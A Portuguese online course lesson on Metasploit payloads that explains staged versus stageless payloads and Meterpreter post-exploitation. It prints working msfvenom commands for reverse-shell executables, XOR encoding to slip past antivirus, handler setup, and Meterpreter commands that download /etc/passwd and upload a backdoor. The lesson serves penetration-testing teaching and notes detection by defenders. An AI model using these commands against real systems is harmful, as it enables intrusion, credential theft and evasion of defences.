Cargas: em Estágios ou sem Estágios, Meterpreter
Escolha a carga adequada para cada cenário e use o Meterpreter na pós-exploração.
Cargas: em Estágios ou sem Estágios, Meterpreter é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 3 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.
O que é uma carga útil?
Uma carga útil é o código executado no destino após uma exploração bem-sucedida. Ela define o que o invasor obtém: um console de comandos, execução de comandos, acesso a arquivos ou um agente completo como o Meterpreter.
Cargas úteis com estágio e sem estágio
As cargas úteis Stageless (/) contêm tudo em um único binário — são maiores, mas mais simples, e não precisam de uma chamada de rede após a entrega inicial. As cargas úteis Staged (//) enviam primeiro um pequeno iniciador que baixa o segundo estágio do manipulador.
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connectsQuando usar cada uma
Use stageless quando o destino não tiver acesso à Internet ou ao manipulador após a exploração inicial — a carga útil precisa ser independente. Use staged quando quiser uma carga útil inicial menor e tiver uma conexão confiável com o manipulador.
Visão geral do Meterpreter
O Meterpreter é a carga útil avançada do Metasploit: é executado inteiramente na memória, usa comunicações criptografadas e fornece uma API abrangente, com acesso ao sistema de arquivos, migração de processos, captura de teclas, captura de telas e pivoteamento.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runComandos do Meterpreter
Comandos essenciais do Meterpreter para a pós-exploração: informações do sistema, lista de processos, operações com arquivos e rede.
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shellMigração de processos
Migre o processo do Meterpreter para um processo mais estável ou menos suspeito (por exemplo, explorer.exe no Windows). Isso também pode elevar privilégios se a migração for feita para um processo com privilégios mais altos.
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsGerando cargas úteis com o msfvenom
O msfvenom gera arquivos de cargas úteis independentes (EXE, ELF, APK, código de shell) para entrega por mensagens fraudulentas, dispositivos USB deixados no local ou shells da Web em testes autorizados.
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elfMulti/Handler para capturar consoles
O módulo auxiliar multi/handler captura conexões reversas de comandos. Configure-o com a mesma carga útil, LHOST e LPORT usados no msfvenom antes de entregar a carga útil.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background jobNoções básicas de codificação e evasão
Os codificadores do msfvenom podem ofuscar cargas úteis para evitar a detecção básica do AV baseada em assinaturas. Observação: o EDR moderno usa detecção comportamental — os codificadores, sozinhos, são insuficientes contra defesas avançadas.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exeCargas úteis de vinculação e reversas
As cargas úteis reversas conectam-se do destino ao invasor (melhor opção para NAT e firewalls). As cargas úteis de vinculação escutam no destino — o invasor conecta-se a ele. As cargas reversas são preferidas na maioria dos cenários.
Detecção de cargas úteis pelos defensores
Os defensores detectam o Meterpreter por meio de: assinaturas de rede (padrões de tráfego de comando e controle), varredura de memória (artefatos de injeção reflexiva de DLL) e análise comportamental (esvaziamento de processos e relações incomuns entre processos pai e filho).
Verificação rápida
O que distingue uma carga útil com estágio de uma sem estágio no Metasploit?
Resumo: cargas úteis e Meterpreter
Escolha cargas úteis com estágio para obter uma presença inicial pequena e cargas sem estágio para uma entrega independente. O Meterpreter é a carga útil mais capaz para a pós-exploração: executado na memória, criptografado e extensível. Use o msfvenom para gerar binários independentes e sempre configure o multi/handler para capturar as conexões de retorno.
Perguntas Frequentes
A aula “Cargas: em Estágios ou sem Estágios, Meterpreter” é grátis?
Sim — o texto completo de “Cargas: em Estágios ou sem Estágios, Meterpreter” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.
O que vou aprender em “Cargas: em Estágios ou sem Estágios, Meterpreter”?
Escolha a carga adequada para cada cenário e use o Meterpreter na pós-exploração. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Cyber Security Academy?
Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 3 de 4.
Quanto tempo leva a aula “Cargas: em Estágios ou sem Estágios, Meterpreter”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Cyber Security Academy?
Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Arquitetura do Metasploit e msfconsole
- Exploração de uma Vulnerabilidade Conhecida
- Cargas: em Estágios ou sem Estágios, Meterpreter
- Pós-Exploração: Pivotar e Persistir